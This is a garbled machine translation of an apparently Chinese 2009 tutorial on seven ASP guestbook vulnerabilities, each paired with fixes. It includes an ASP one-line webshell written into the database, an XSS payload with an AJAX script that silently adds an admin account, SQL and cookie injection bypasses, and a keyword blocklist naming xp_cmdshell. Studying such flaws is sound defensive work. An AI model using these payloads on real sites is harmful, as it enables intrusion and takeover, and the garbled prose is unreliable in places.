For the guestbook vulnerability discovery-vulnerability warning-the black bar safety net

2009-04-21T00:00:00
ID MYHACK58:62200922995
Type myhack58
Reporter 佚名
Modified 2009-04-21T00:00:00

Description

Guestbook of a single function, generally for the ordinary viewer only message function. And for the administrator function of how much is written on the guestbook of the optimization. Generally the administrator has to reply to a message edit a message delete a message there are websites users to modify website based similar with title, etc. changes.

Common Vulnerability ①

Conn. asp storm library vulnerability

Test procedure: Baba Studio guestbook 2. 0

Vulnerability code:

<%

dim conn,mydb,db,rs

db=dbstr&"data/#baba@yaoyao520.mdb"

AccessPath=dbstr&"data"

Set Conn = Server. CreateObject("ADODB. Connection")

mydb="Provider=Microsoft. Jet. OLEDB. 4. 0;Data Source=" & Server. MapPath(""&db&"")

Conn. Open Mydb

%>

In fact, this is also not counting on the exploit code for this vulnerability is the reason everyone can see the vip scripts invasion tutorials[Lesson 5]storm library the principles and practice of

Direct access to put the path of the burst.

!

'C:\Inetpub\111\ 留言本 2.0\include\data\#baba@yaoyao520.mdb'

See this section of the bar. 正常 的 数据库 文件 在 C:\Inetpub\111\ 留言本 2.0\data\#baba@yaoyao520.mdb 这里 the.

Prevention methods:

Directly in conn. asp adding fault-tolerant statements.

On error resume next

!

Common Vulnerabilities ②

Database download vulnerability

In fact, the database called database download vulnerability., there are two.

  1. The default database download.

Because a lot of people don't care about the message of the security so many people are using the default database. Lead can download.

Or more of the program do the test. Which#needs to be converted to%2 of 3.

!

There is a suffix if it is asp or asa access out garbled, you can use Thunder download software download.

!

  1. Using the storm library vulnerability access to the database, and then download. The download method as described above.

Prevention methods:

  1. Modify the default database address.

  2. Add an anti-download the table

Common Vulnerability ③

Injection vulnerability

Here injection vulnerability with the ordinary injection vulnerability. Since haven't found good examples, so the previous code modified a bit.

Test procedure: Baba Studio guestbook 2. 0

Remove the conn. the asp side of the injection code.

lives. asp

set rs=server. CreateObject("adodb. recordset")

sql="select * from gonggao where id="&request. QueryString("id")

rs. open sql,conn,1,3

This is due to the variable id didn't do the filter lead to code injection.

!

!

But here the program conn. asp has anti-injection code.

The code is as follows:

<%

'-------- The definition part of the------------------

Dim XH_Post,XH_Get,XH_In,XH_Inf,XH_Xh,XH_db,XH_dbstr

'Self-defined need to filter the string,with "|" separator

XH_In = "'|;|and|exec|insert|select|delete%20from|update|count|*|%|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"

'----------------------------------

%>

<%

XH_Inf = split(XH_In,"|")

'-------- POST part------------------

If Request. Form<>"" Then

For Each XH_Post In The Request. Form

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request. Form(XH_Post)),XH_Inf(XH_Xh))<>0 Then

Response. Write "<Script Language=JavaScript>alert('submitted content is illegal! Be fine plus I QQ: 2 5 3 4 3 6 5 7 7');</Script>"

Response. Write "illegal operation! The system made the following record↓<br>"

Response. Write "operation of the Ip:"&Request. ServerVariables("REMOTE_ADDR")&"<br>"

Response. Write "operation time:"&Now&"<br>"

Response. Write "operation page:"&Request. ServerVariables("URL")&"<br>"

Response. Write "submission: post<br>"

Response. Write "submission parameters:"&amp; XH_Post&"<br>"

Response. Write "submitted data:"&Request. Form(XH_Post)

Response. Write "<Script Language=JavaScript>alert('submitted content is illegal! Be fine plus I QQ: 2 5 3 4 3 6 5 7 7');the window. close();</Script>"

Response. End

End If

Next

Next

End If

'----------------------------------

'-------- GET parts-------------------

If Request. QueryString<>"" Then

For Each XH_Get In The Request. QueryString

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request. QueryString(XH_Get)),XH_Inf(XH_Xh))<>0 Then

Response. Write "<Script Language=JavaScript>alert('submitted content is illegal! Be fine plus I QQ: 2 5 3 4 3 6 5 7 7');</Script>"

Response. Write "illegal operation! The system made the following record↓<br>"

Response. Write "operation of the Ip:"&Request. ServerVariables("REMOTE_ADDR")&"<br>"

Response. Write "operation time:"&Now&"<br>"

Response. Write "operation page:"&Request. ServerVariables("URL")&"<br>"

Response. Write "submission to: GET<br>"

Response. Write "submission parameters:"&amp; XH_Get&"<br>"

Response. Write "submitted data:"&Request. QueryString(XH_Get)

Response. Write "<Script Language=JavaScript>alert('submitted content is illegal! Be fine plus I QQ: 2 5 3 4 3 6 5 7 7');the window. close();</Script>"

Response. End

End If

Next

Next

End If

'----------------------------------

%>

Everyone on this code more familiar. Standard anti-injection procedures. As long as the recent one year of injection there is to know about it know that this code didn't do the cookie filter cause we can use the cookie injection.

Prevention methods:

  1. Add the cookies to the anti-injection code

  2. To get the variable to be filtered.

Common Vulnerabilities ④

Background verification vulnerability

Simple to say this is the deformation of the sql injection vulnerability.

Test procedure: the mood of the story house guestbook system

checkpass. asp

<!--# include file="conn. asp" - >

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<%

admin=request. form("admin") 'define the admin value is the form to pass over the user name domain name admin

password=request. form("password") 'define the password value is a tableA single pass over the user name domain name password

if admin="" or password="" then 'this sentence mean if the user name and password is not entered, then execution of the next sentence

response. Write("<script language=javascript>alert('please fill in Complete!'); history. go(-1)</script>") 'use a javascript script to prompt the user

end if 'End of if statement

sql="select * from admin where admin='"&admin&"' and password='"&password&"'" 'query the admin table of admin and the password two fields

set rs=conn. execute(sql) 'set the recordset rs, with conn Execute SQL statements

if rs. eof or rs. bof then 'when there is no compliance with screening results, Proceed to the following sentences

response. write "<script language=javascript>"

response. write "alert('user or password wrong!');"

response. write "javascript:history. go(-1);"

response. write "</script>" 'with a javascript script to prompt the user

else 'if it meets the conditions of the time

session("admin")=admin 'create a new session, the value is equal to the form coming from the username

response. write"<SCRIPT language=JavaScript>alert('login successful');"

response. write"this. location. href='mymanage. asp';</SCRIPT>"

end if 'End of if statement

%>

!

!

Prevention methods:

This vulnerability direct filtration“’”on the line.

However for injections make sure to conduct a comprehensive filtration.

Common Vulnerabilities ⑤

Database write vulnerability

This vulnerability I'm looking for the Code of the process is also more strenuous, and some use more strenuous, so I modified it. Make use of the comparison directly.

Index. asp

Id=Request. Querystring("Id")

Books_mingzi=htmlencode(Request. form("mingzi"))

If Books_mingzi="" then Books_mingzi="anonymous" End If

Books_biaoti=htmlencode(Request. form("biaoti"))

Books_neirong=htmlencode(Request. form("neirong"))

Here the use of the htmlencode is too great, we just use one to remove the filter and then test it.

I'm here to remove the neirong front of the htmlencode it.

Submitted<%execute request("value")%>to the content, access the database path can be seen as follows.

!

The direct use of blue-screen word submit on it.

Well a simple written explanation.

We then see this in the code is relatively simple to write.

Here I didn't do the actual test, but remember it like it 0 6 years someone special for this written article, for php, it is estimated that the asp also almost.)

Set mRs= Server. CreateObject("adodb. recordSet")

mRs. open "Select * from dqe_gustbook", conn, 1, 3

mRs. addnew

mRs("who") = Books_mingzi

mRs("biaoti") = Books_biaoti

mRs("neirong") = Books_neirong

mRs("lanmu") = lanmu

mRs("zhiding") = 0

mRs("shijian") = now()

UserIP = Request. ServerVariables("HTTP_X_FORWARDED_FOR")

If UserIP = "" Then userip = Request. ServerVariables("REMOTE_ADDR")

mRs("ip") = UserIP

mRs. update

mRs. close

Here UserIP = Request. ServerVariables("HTTP_X_FORWARDED_FOR")

If UserIP = "" Then userip = Request. ServerVariables("REMOTE_ADDR")

Because"HTTP_X_FORWARDED_FOR"this value is get by HTTP header"X_FORWARDED_FOR"attribute to obtain. So here it is supplied to the malicious destruction of a way:you can fake IP address!

For this I only say so much, I hope you yourself continue in the study.

There are many filter form can be bypassed, want everyone to play their innovation capability. Share your own tips.

Common Vulnerabilities ⑥

Embedxssvulnerability

This is the use of deep learning(asp)message Board, that is the hack Defense challenge topics.

We submitted our PLR content is<script>alert(“hacker Defense”)</script>

!

!

From the back-end login access to the browsing information see cross-site effects.

!

Next is the use of cross-stations to get what we need to do the operation.

This topic I asked you to modify the message attached to the penultimate message.

This topic so far is a person to complete the ice-wind Valley[Z. S. T].

I'm here on the direct use of him to write the ajax code to complete this teaching.

function getXHR() {

var xhr = null

if (window. XMLHttpRequest) {

xhr = new XMLHttpRequest();

} else if (window. createRequest) {

xhr = window. createRequest();

} else if (window. ActiveXObject) {

try {

xhr = new ActiveXObject('Msxml2. XMLHTTP');

} catch( E ) {

try {

xhr = new ActiveXObject('Microsoft. XMLHTTP');

} catch(E) {}

}

}

return xhr;

}

var ajax = getXHR();

ajax. open('POST','/admin/guestBook/guestBook_update. asp',false);

ajax. setRequestHeader("Content-Type","application/x-www-form-urlencoded");

ajax. send("guestName=test&guestContent=bingxuefenggu&guest_ID=1 9");//

ajax. onreadystatechange=function() {}

var ajax1 = getXHR();

ajax1. open('POST','/admin/adminUser/adminUser_Add. asp',false);

ajax1. setRequestHeader("Content-Type","application/x-www-form-urlencoded");

ajax1. send("UserName=test&password1=test");

Here after two submissions, are based on post code, The first one is to modify the post, and the second is to add the user. Wind Valley is not honest, I would have let modify only the content, but he also added a add.

Prevention methods:

Function htmlencode(fString)

If not isnull(fString) then

fString = replace(fString, ">", ">")

fString = replace(fString, "<", "<")

fString = Replace(fString, CHR(3 2), " ")

fString = Replace(fString, CHR(9), " ")

fString = Replace(fString, CHR(3 4), """)

fString = Replace(fString, CHR(3 9), "'")

fString = Replace(fString, CHR(1 3), "")

fString = Replace(fString, CHR(1 0) & CHR(1 0), "</p><p> ")

fString = Replace(fString, CHR(1 0), "<br> ")

htmlencode = fString

End If

End Function

Common Vulnerabilities ⑦

URL xssvulnerability

For the URL cross-site I don't want to speak too much, to keep up with the surface is embeddedxssalmost.

We can look at the Action Network of the plurality of URL xsscross site vulnerability

http://sites.google.com/site/bsnguanzhujiaobenanquan/-b-s-n-gong-gao/asploudongdongwangduogeurlxsskuazhanloudong